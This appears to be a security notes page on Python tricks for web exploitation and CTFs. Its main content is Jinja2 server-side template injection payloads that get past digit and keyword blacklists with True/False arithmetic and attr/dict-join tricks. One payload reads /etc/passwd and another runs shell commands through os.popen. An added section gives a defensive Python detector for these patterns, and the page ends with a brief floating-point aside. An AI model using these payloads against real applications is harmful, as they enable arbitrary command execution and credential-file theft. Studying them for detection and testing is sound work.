
Python

Python's main site: https://www.python.org/

Python Package Index: https://pypi.org/

Numbers using True and False

  • Python numbers can be formed using only True and False values:
str(True+True+True+True)+str(False+False) # '40'
  • This can be used to bypass number filters in Python-based web apps:
{{ ''.__class__.__mro__[str(True+True)].__subclasses__()[str(True+True+True+True)+str(False+False)]('/etc/passwd').read() }}

Keep in mind this is only an idea, not really a PoC; some tweaking may be needed.

Blacklisted numbers

  • When numbers are blacklisted, you can use attr instead, something like this:
{{[]|attr(dict(__cla=x, ss__=y)|join)}}
{{[]|attr(dict(__cla=x, ss__=y)|join)|attr(dict(__base__=x)|join)|attr(dict(__subclas=x, ses__=y)|join)()}}

Example working payload:

{{get_flashed_messages|attr(dict(__globals__=x)|join)|attr(dict(get=x)|join)(dict(__builtins__=x)|join)|attr(dict(get=x)|join)(dict(__import__=x)|join)(dict(os=x)|join)|attr(dict(popen=x)|join)(dict(ls=x)|join)|attr(dict(read=x)|join)()}}
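
Seen from the defending side, a digit blacklist lets both techniques above through while rejecting harmless input. The following is an added example, not part of the original page: a standard-library Python check that flags True/False arithmetic and names assembled with dict(...)|join inside template expressions. The function names and reason labels are assumptions made for the illustration.

```python
import re

EXPR = re.compile(r"\{\{(.*?)\}\}|\{%(.*?)%\}", re.S)    # Jinja2 expression / statement blocks
DICT_JOIN = re.compile(r"dict\(([^()]*)\)\s*\|\s*join")  # dict(k1=x, k2=y)|join
DUNDER = re.compile(r"__\w+__")
ATTR_FILTER = re.compile(r"\|\s*attr\s*\(")
BOOL_MATH = re.compile(r"\b(?:True|False)\s*\+")

def digit_blacklist_allows(text):
    """The kind of filter the page's payloads are written to pass: reject any digit."""
    return re.search(r"\d", text) is None

def joined_keys(expr):
    """Rebuild each string that dict(...)|join yields (the keyword names, concatenated)."""
    built = []
    for args in DICT_JOIN.findall(expr):
        keys = [p.split("=", 1)[0].strip() for p in args.split(",") if "=" in p]
        built.append("".join(keys))
    return built

def findings(text):
    """Sorted reasons why a user-supplied string looks like a template-injection attempt."""
    reasons = set()
    for match in EXPR.finditer(text):
        expr = match.group(1) or match.group(2) or ""
        if ATTR_FILTER.search(expr):
            reasons.add("attr-filter")
        if BOOL_MATH.search(expr):
            reasons.add("bool-arithmetic")
        if DUNDER.search(expr):
            reasons.add("dunder-literal")
        for name in joined_keys(expr):
            if DUNDER.fullmatch(name):  # split name only becomes a dunder once joined
                reasons.add("dunder-built:" + name)
    return sorted(reasons)

# Sample inputs: the first two are shortened from the payloads on this page,
# the third is a constructed harmless string.
SAMPLES = [
    "{{ ''.__class__.__mro__[str(True+True)] }}",
    "{{[]|attr(dict(__cla=x, ss__=y)|join)}}",
    "Order 66 shipped to Alice",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(digit_blacklist_allows(sample), findings(sample), sample)
```

Pattern checks like this are a detection aid for logs or WAF rules; the fix for the underlying issue is to never build template source from user input.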

Floating point Limitation

  • Python has a floating-point limitation: if the float value being stored is too long, the value that Python actually returns will not be exactly the same.

  • This can be a limitation in exploit development, but it can also be used to bypass certain things, for example "disproving" Fermat's Last Theorem; for this, refer to UgraCTF.